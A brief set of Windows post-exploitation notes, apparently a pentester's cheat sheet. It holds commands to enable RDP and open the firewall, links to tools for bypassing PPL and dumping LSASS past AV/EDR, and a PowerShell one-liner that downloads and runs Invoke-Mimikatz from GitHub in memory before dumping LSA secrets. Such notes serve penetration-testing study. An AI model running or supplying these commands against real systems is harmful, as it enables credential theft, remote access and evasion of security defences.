Random Notes:
- Testing for CLM:
$ExecutionContext.SessionState.LanguageMode
- Enable RDP & Firewall:
- reg add “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server” /v fDenyTSConnections /t REG_DWORD /d 0 /f
- netsh firewall set service type = remotedesktop mode = enable
Local Privilege Escalation:
Cheatsheet Resources:
- https://book.hacktricks.xyz/windows/windows-local-privilege-escalation
Dumping Credentials:
Bypassing PPL:
- https://github.com/itm4n/PPLdump
- https://github.com/RedCursorSecurityConsulting/PPLKiller
Dump LSASS bypassing AV/EDR
- https://github.com/outflanknl/Dumpert
Mimikatz:
- https://hunter2.gitbook.io/darthsidious/privilege-escalation/mimikatz
- iex (New-Object Net.Webclient).DownloadString(“https://raw.githubusercontent.com/samratashok/nishang/master/Gather/Invoke-Mimikatz.ps1”)
- Invoke-Mimikatz -Command ‘”token::elevate” “lsadump::secrets”‘